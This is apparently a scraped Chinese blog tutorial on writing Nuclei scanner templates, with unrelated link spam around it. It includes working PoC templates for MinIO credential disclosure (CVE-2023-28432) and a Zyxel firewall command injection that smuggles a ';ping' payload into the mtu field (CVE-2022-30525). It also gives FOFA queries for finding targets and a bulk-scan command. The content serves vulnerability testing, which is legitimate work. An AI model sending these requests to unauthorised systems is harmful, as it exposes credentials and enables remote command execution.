当前位置: 首页 > news >正文

获胜者网站建设平面广告设计图片素材

获胜者网站建设,平面广告设计图片素材,京东这样的网站怎么做,制作销售网站有哪些问题0x00 nuclei Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。 提供TCP、DNS、HTTP、FILE 等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。 …

0x00 nuclei

Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。 提供TCP、DNS、HTTP、FILE 等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。

0x01 poc编写规则-yaml语法特点

大小写敏感
缩进敏感
不允许tab,只能空格

0x02 yaml的五步模板

id:编号
info:漏洞描述情况(级别,编号,标签,简介等)
http:漏洞利用核心, {{xx}}:提取目标地址的匹配信息
提取器/匹配器:提取,匹配返回包内容,匹配出需要的目标(根据目标结果特征用匹配还是提取)

编写方法流程:
1.选用套用模板
2.创建独立编号
3.填写漏洞详情
4.poc协议
5.匹配方案
6.提取方案

0x03 cve-2023-28432MiniO信息泄露

id: CVE-2023-28432info:name: CVE-2023-28432 MinIO 信息泄露漏洞author: gaobaiseverity: highdescription: |CVE-2023-28432 MinIO 信息泄露漏洞,可以直接获取user和passwordreference:- https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/- fofa:banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”http:- raw:- |POST /minio/bootstrap/v1/verify HTTP/1.1Host: {{Hostname}}Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: MozillaAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closematchers-condition: andmatchers:- type: wordpart: bodywords:- 'MINIO_SECRET_KEY'- 'MINIO_ROOT_PASSWORD'- type: statusstatus:- 200

0x04 cve-2022-30525 Zyxel 防火墙远程命令注入漏洞

id: CVE-2022-30525info:name: CVE-2022-30525 Zyxel 防火墙远程命令注入漏洞author: gaobaiseverity: highdescription: |CVE-2022-30525 Zyxel 防火墙远程命令注入漏洞reference:- https://blog.csdn.net/weixin_43080961/article/details/124776553- fofa:title="USG FLEX 100" || "USG FLEX 100W" || "USG FLEX 200" || "USG FLEX 500" || "USG FLEX 700"http:- raw:- |POST /ztp/cgi-bin/handler HTTP/1.1Host: {{Hostname}}Content-Type: application/json{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"{{gaobai}}","data":"hi"}payloads:gaobai:- ";ping -c 3 {{interactsh-url}};"matchers-condition: andmatchers:- type: wordpart: interactsh_protocolname: dnswords:- "dns"- type: statusstatus:- 200

nuclei使用方法:

nuclei -l D:\Desktop\top500e.txt  -t D:\Desktop\CVE-2022-30525.yaml -o e.html


参考:

https://blog.csdn.net/qq_41315957/article/details/126594572
https://blog.csdn.net/qq_41315957/article/details/126594670
小迪安全
http://www.yayakq.cn/news/213074/

相关文章:

  • 网站访问速度 云组机wordpress 音乐主题
  • 常州网站推广软件厂家网易游戏
  • 东莞网站制作公阜阳企业网站推广
  • 建设网站如果赚钱wordpress网站访问慢
  • 长春给企业做网站的公司网站需要哪些东西
  • qifeiye做的网站如何平果信息网二手房
  • 帝国网站seo网站免费做软件有哪些
  • 网站开发部组织架构网站建站大约多少钱
  • 网站建设与管理实训心得体会万网怎么做网站
  • 网站开发文档范例医药类网站怎么做seo
  • 重庆环保公司网站建设品牌建设标准
  • 如何设立邮箱和网站重头重装wordpress
  • 简约 网站旅游社做的最好的网站
  • 网站开发第三方登录设计爱情动作片做网站
  • 高明网站建设首选公司中国分类信息平台
  • 献县做网站深圳最近一个星期新闻
  • 免费建网站广告语ui设计的基本流程图
  • 表白网站在线生成百度数据库
  • 做网站如何团队分工wordpress插件密钥服务器
  • 网站建设销售工资多少网站建设期末答案
  • 漳州网站建设优化如何建个人摄影网站
  • 品牌网站建设策划沭阳做网站公司排名前十
  • 遂宁建设网站为wordpress添加虚拟用户权限
  • 空间有了怎么做网站wordpress的ssl
  • 网站开发外包费用做一个网站 如何盈利
  • 中国建设银行网站济南网点公司官网制作需要多少钱一个
  • 做多国语言网站南充网站建设与维护
  • 网站加视频wordpress首页验证码
  • 郑州网站开发顾问网页制作工具按其制作方式分可以分为
  • 做一个php连接sql网站甘肃省交通建设集团有限公司网站